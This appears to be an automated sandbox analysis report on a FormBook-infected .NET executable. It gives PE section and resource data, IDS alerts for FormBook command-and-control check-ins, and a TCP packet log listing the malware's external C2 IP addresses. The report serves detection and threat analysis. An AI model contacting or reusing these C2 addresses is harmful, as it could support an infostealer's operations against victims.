                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                Data Directories

                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xbbc410x4f.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x1770.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xb91f00x70.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                Sections

                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x20000xb9c9c0xb9e003bf31a69d95c4db6be9a23c24d3a20d5False0.9506083977807667data7.942883165317064IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rsrc0xbc0000x17700x1800735ad023ac646483b563dd9114988266False0.34423828125data5.619552021446162IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0xbe0000xc0x200628eba7e1432c85ab31f4487538649c1False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                Resources

                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                RT_ICON0xbc1300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.3079268292682927
                                                                                                                                                RT_GROUP_ICON0xbd1d80x14data1.1
                                                                                                                                                RT_VERSION0xbd1ec0x398OpenPGP Public Key0.4206521739130435
                                                                                                                                                RT_MANIFEST0xbd5840x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                Imports

                                                                                                                                                DLLImport
                                                                                                                                                mscoree.dll_CorExeMain

                                                                                                                                                Network Behavior

                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-11-25T09:42:30.625653+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449741104.21.16.20680TCP
                                                                                                                                                2024-11-25T09:42:48.000735+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449742185.27.134.14480TCP
                                                                                                                                                2024-11-25T09:42:50.708449+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449743185.27.134.14480TCP
                                                                                                                                                2024-11-25T09:42:53.318751+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449744185.27.134.14480TCP
                                                                                                                                                2024-11-25T09:42:56.021633+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449745185.27.134.14480TCP
                                                                                                                                                2024-11-25T09:43:03.384367+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975374.48.143.8280TCP
                                                                                                                                                2024-11-25T09:43:06.154691+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975974.48.143.8280TCP
                                                                                                                                                2024-11-25T09:43:08.759106+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976674.48.143.8280TCP
                                                                                                                                                2024-11-25T09:43:11.526224+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44977674.48.143.8280TCP
                                                                                                                                                2024-11-25T09:43:19.041365+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449792206.238.89.11980TCP
                                                                                                                                                2024-11-25T09:43:21.791205+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449798206.238.89.11980TCP
                                                                                                                                                2024-11-25T09:43:24.525641+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449804206.238.89.11980TCP
                                                                                                                                                2024-11-25T09:43:27.327256+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449810206.238.89.11980TCP
                                                                                                                                                2024-11-25T09:43:34.856244+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449830212.123.41.10880TCP
                                                                                                                                                2024-11-25T09:43:37.476403+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449836212.123.41.10880TCP
                                                                                                                                                2024-11-25T09:43:40.197423+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449842212.123.41.10880TCP
                                                                                                                                                2024-11-25T09:43:43.245519+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449848212.123.41.10880TCP
                                                                                                                                                2024-11-25T09:43:50.075410+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449864172.67.223.20680TCP
                                                                                                                                                2024-11-25T09:43:52.764122+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449872172.67.223.20680TCP
                                                                                                                                                2024-11-25T09:43:55.400153+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449881172.67.223.20680TCP
                                                                                                                                                2024-11-25T09:43:58.058248+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449887172.67.223.20680TCP
                                                                                                                                                2024-11-25T09:44:05.306994+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449903172.67.186.19280TCP
                                                                                                                                                2024-11-25T09:44:07.720301+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449909172.67.186.19280TCP
                                                                                                                                                2024-11-25T09:44:10.340449+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449915172.67.186.19280TCP
                                                                                                                                                2024-11-25T09:44:13.151658+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449923172.67.186.19280TCP
                                                                                                                                                2024-11-25T09:44:20.346737+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449941161.97.142.14480TCP
                                                                                                                                                2024-11-25T09:44:23.073497+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449948161.97.142.14480TCP
                                                                                                                                                2024-11-25T09:44:25.814341+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449954161.97.142.14480TCP
                                                                                                                                                2024-11-25T09:44:28.762644+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449961161.97.142.14480TCP
                                                                                                                                                2024-11-25T09:44:35.744959+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44997843.199.54.15880TCP
                                                                                                                                                2024-11-25T09:44:38.416552+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44998643.199.54.15880TCP
                                                                                                                                                2024-11-25T09:44:41.088357+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44999343.199.54.15880TCP
                                                                                                                                                2024-11-25T09:44:43.815065+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44999943.199.54.15880TCP
                                                                                                                                                2024-11-25T09:44:50.674461+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450015209.74.77.10880TCP
                                                                                                                                                2024-11-25T09:44:53.340985+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450022209.74.77.10880TCP
                                                                                                                                                2024-11-25T09:44:56.024434+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450030209.74.77.10880TCP
                                                                                                                                                2024-11-25T09:44:58.679491+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450035209.74.77.10880TCP
                                                                                                                                                2024-11-25T09:45:05.816414+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450044185.27.134.20680TCP
                                                                                                                                                2024-11-25T09:45:08.524374+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450045185.27.134.20680TCP
                                                                                                                                                2024-11-25T09:45:11.241502+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450046185.27.134.20680TCP
                                                                                                                                                2024-11-25T09:45:13.852045+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450047185.27.134.20680TCP
                                                                                                                                                2024-11-25T09:45:22.341229+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450048163.44.185.18380TCP
                                                                                                                                                2024-11-25T09:45:24.967807+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450049163.44.185.18380TCP
                                                                                                                                                2024-11-25T09:45:27.713508+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450050163.44.185.18380TCP
                                                                                                                                                2024-11-25T09:45:30.299304+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450051163.44.185.18380TCP
                                                                                                                                                2024-11-25T09:45:37.664918+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450052217.160.0.20080TCP
                                                                                                                                                2024-11-25T09:45:40.365321+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450053217.160.0.20080TCP
                                                                                                                                                2024-11-25T09:45:43.090803+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450054217.160.0.20080TCP
                                                                                                                                                2024-11-25T09:45:45.806704+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450055217.160.0.20080TCP
                                                                                                                                                2024-11-25T09:45:53.457941+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450056107.167.84.4280TCP
                                                                                                                                                2024-11-25T09:45:56.166119+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450057107.167.84.4280TCP
                                                                                                                                                2024-11-25T09:45:58.766192+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450058107.167.84.4280TCP
                                                                                                                                                2024-11-25T09:46:01.480359+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450059107.167.84.4280TCP
                                                                                                                                                2024-11-25T09:46:09.371073+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45006077.68.64.4580TCP

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Nov 25, 2024 09:42:29.192503929 CET4974180192.168.2.4104.21.16.206
                                                                                                                                                Nov 25, 2024 09:42:29.312155008 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:29.312347889 CET4974180192.168.2.4104.21.16.206
                                                                                                                                                Nov 25, 2024 09:42:29.323622942 CET4974180192.168.2.4104.21.16.206
                                                                                                                                                Nov 25, 2024 09:42:29.443384886 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.625463963 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.625514984 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.625550032 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.625586987 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.625618935 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.625653028 CET4974180192.168.2.4104.21.16.206
                                                                                                                                                Nov 25, 2024 09:42:30.625691891 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.625725031 CET4974180192.168.2.4104.21.16.206
                                                                                                                                                Nov 25, 2024 09:42:30.625726938 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.625734091 CET4974180192.168.2.4104.21.16.206
                                                                                                                                                Nov 25, 2024 09:42:30.625761986 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.625797033 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.625804901 CET4974180192.168.2.4104.21.16.206
                                                                                                                                                Nov 25, 2024 09:42:30.625833035 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.625873089 CET4974180192.168.2.4104.21.16.206
                                                                                                                                                Nov 25, 2024 09:42:30.745532036 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.745598078 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.745707035 CET4974180192.168.2.4104.21.16.206
                                                                                                                                                Nov 25, 2024 09:42:30.826632023 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.826689959 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.826802969 CET4974180192.168.2.4104.21.16.206
                                                                                                                                                Nov 25, 2024 09:42:30.830848932 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.830943108 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.831038952 CET4974180192.168.2.4104.21.16.206
                                                                                                                                                Nov 25, 2024 09:42:30.839205027 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.839277029 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.839366913 CET4974180192.168.2.4104.21.16.206
                                                                                                                                                Nov 25, 2024 09:42:30.847651958 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.847783089 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:30.847883940 CET4974180192.168.2.4104.21.16.206
                                                                                                                                                Nov 25, 2024 09:42:30.851448059 CET4974180192.168.2.4104.21.16.206
                                                                                                                                                Nov 25, 2024 09:42:30.971082926 CET8049741104.21.16.206192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:46.584777117 CET4974280192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:46.704447985 CET8049742185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:46.704541922 CET4974280192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:46.719499111 CET4974280192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:46.839126110 CET8049742185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:48.000629902 CET8049742185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:48.000648975 CET8049742185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:48.000735044 CET4974280192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:48.228627920 CET4974280192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:49.247580051 CET4974380192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:49.367146969 CET8049743185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:49.367242098 CET4974380192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:49.382522106 CET4974380192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:49.502155066 CET8049743185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:50.708312035 CET8049743185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:50.708396912 CET8049743185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:50.708448887 CET4974380192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:50.885044098 CET4974380192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:51.903884888 CET4974480192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:52.023439884 CET8049744185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:52.023648024 CET4974480192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:52.039318085 CET4974480192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:52.158991098 CET8049744185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:52.159023046 CET8049744185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:52.159096003 CET8049744185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:52.159130096 CET8049744185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:52.159178019 CET8049744185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:52.159343004 CET8049744185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:52.159369946 CET8049744185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:52.159395933 CET8049744185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:52.159423113 CET8049744185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:53.318517923 CET8049744185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:53.318551064 CET8049744185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:53.318751097 CET4974480192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:53.541223049 CET4974480192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:54.560883045 CET4974580192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:54.680572987 CET8049745185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:54.680717945 CET4974580192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:54.690721989 CET4974580192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:54.810455084 CET8049745185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:56.021442890 CET8049745185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:56.021466017 CET8049745185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:42:56.021632910 CET4974580192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:56.024231911 CET4974580192.168.2.4185.27.134.144
                                                                                                                                                Nov 25, 2024 09:42:56.143829107 CET8049745185.27.134.144192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:02.048356056 CET4975380192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:02.167898893 CET804975374.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:02.168086052 CET4975380192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:02.232209921 CET4975380192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:02.351942062 CET804975374.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:03.384166956 CET804975374.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:03.384260893 CET804975374.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:03.384313107 CET804975374.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:03.384366989 CET4975380192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:03.384366989 CET4975380192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:03.744431019 CET4975380192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:04.763336897 CET4975980192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:04.882932901 CET804975974.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:04.883044004 CET4975980192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:04.897916079 CET4975980192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:05.017546892 CET804975974.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:06.154476881 CET804975974.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:06.154603958 CET804975974.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:06.154619932 CET804975974.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:06.154690981 CET4975980192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:06.400526047 CET4975980192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:07.419594049 CET4976680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:07.539330006 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.539442062 CET4976680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:07.554625988 CET4976680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:07.674612045 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.674700975 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.674753904 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.674806118 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.674941063 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.675025940 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.675127983 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.675168037 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:07.675285101 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:08.759027004 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:08.759105921 CET4976680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:09.073550940 CET4976680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:09.193070889 CET804976674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:10.092510939 CET4977680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:10.212009907 CET804977674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:10.214416027 CET4977680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:10.226810932 CET4977680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:10.346309900 CET804977674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:11.526035070 CET804977674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:11.526052952 CET804977674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:11.526070118 CET804977674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:11.526223898 CET4977680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:11.529161930 CET4977680192.168.2.474.48.143.82
                                                                                                                                                Nov 25, 2024 09:43:11.648782015 CET804977674.48.143.82192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:17.393229961 CET4979280192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:17.512815952 CET8049792206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:17.512913942 CET4979280192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:17.534715891 CET4979280192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:17.654418945 CET8049792206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:19.041364908 CET4979280192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:19.078130007 CET8049792206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:19.078227043 CET4979280192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:19.078257084 CET8049792206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:19.078349113 CET4979280192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:19.160823107 CET8049792206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:19.160881996 CET4979280192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:20.092895031 CET4979880192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:20.212677002 CET8049798206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:20.212762117 CET4979880192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:20.283946037 CET4979880192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:20.403467894 CET8049798206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:21.791204929 CET4979880192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:21.822235107 CET8049798206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:21.822459936 CET4979880192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:21.822475910 CET8049798206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:21.822832108 CET4979880192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:21.910852909 CET8049798206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:21.912076950 CET4979880192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:22.854609966 CET4980480192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:22.974181890 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:22.974272013 CET4980480192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:23.012981892 CET4980480192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:23.132739067 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132750034 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132760048 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132764101 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132846117 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132854939 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132867098 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132960081 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:23.132968903 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:24.525640965 CET4980480192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:24.539942026 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:24.540035009 CET4980480192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:24.545037985 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:24.545103073 CET4980480192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:24.645121098 CET8049804206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:24.645190001 CET4980480192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:25.646199942 CET4981080192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:25.765700102 CET8049810206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:25.765768051 CET4981080192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:25.871084929 CET4981080192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:25.990614891 CET8049810206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:27.326922894 CET8049810206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:27.327135086 CET8049810206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:27.327255964 CET4981080192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:27.329874992 CET4981080192.168.2.4206.238.89.119
                                                                                                                                                Nov 25, 2024 09:43:27.449471951 CET8049810206.238.89.119192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:33.378108978 CET4983080192.168.2.4212.123.41.108
                                                                                                                                                Nov 25, 2024 09:43:33.497734070 CET8049830212.123.41.108192.168.2.4
                                                                                                                                                Nov 25, 2024 09:43:33.497876883 CET4983080192.168.2.4212.123.41.108
